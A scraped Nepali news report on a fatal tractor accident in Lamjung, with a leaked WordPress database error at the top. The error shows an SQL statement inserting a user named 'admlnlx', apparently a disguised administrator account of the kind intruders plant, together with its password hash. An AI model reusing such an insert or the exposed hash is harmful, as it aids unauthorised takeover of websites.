WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BS0sUmZoaXOV2fsnlnZQJZC0fWCosl/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 23:35:27', '', 'admlnlx', 'admlnlx')
भोटेओडार (लमजुङ),माघ १२ –
लमजुङको भोटेओडारस्थित पैरेमा ट््याक्टर दुर्घटना हुँदा एकजनाको मृत्यु भएको छ ।
भोटेओडारदेखि सुन्दरबजारतर्फ जाँदै गरेको ग १ त ३०२३ नं को ट््याक्टर दिउँसो २ः४५ बजे दुर्घटनामा भएको हो । दुर्घटनामा परी सहचालक तनहुँको रुपाकोट– २ मानेचौक निवासी २७ वर्षीय पूर्णबहादुर तामाङको घटनास्थलमै मृत्यु भएको प्रहरीले जनाएको छ ।
ओरालोमा ब्रेक फेल भएका कारण दुर्घटना भएको हुनसक्ने जिल्ला ट्राफिक प्रहरी कार्यालयका प्रमुख कृष्णबहादुर क्षेत्रीले बताउनुभयो । उहाँकाअनुसार दुर्घटनामा परी घाइते भएका चालक वर्ष २७ का सुरज गायकको स्थानीय कर्मदा अस्पतालमा उपचार गरिएको र उनको अवस्था सामान्ये छ । – रासस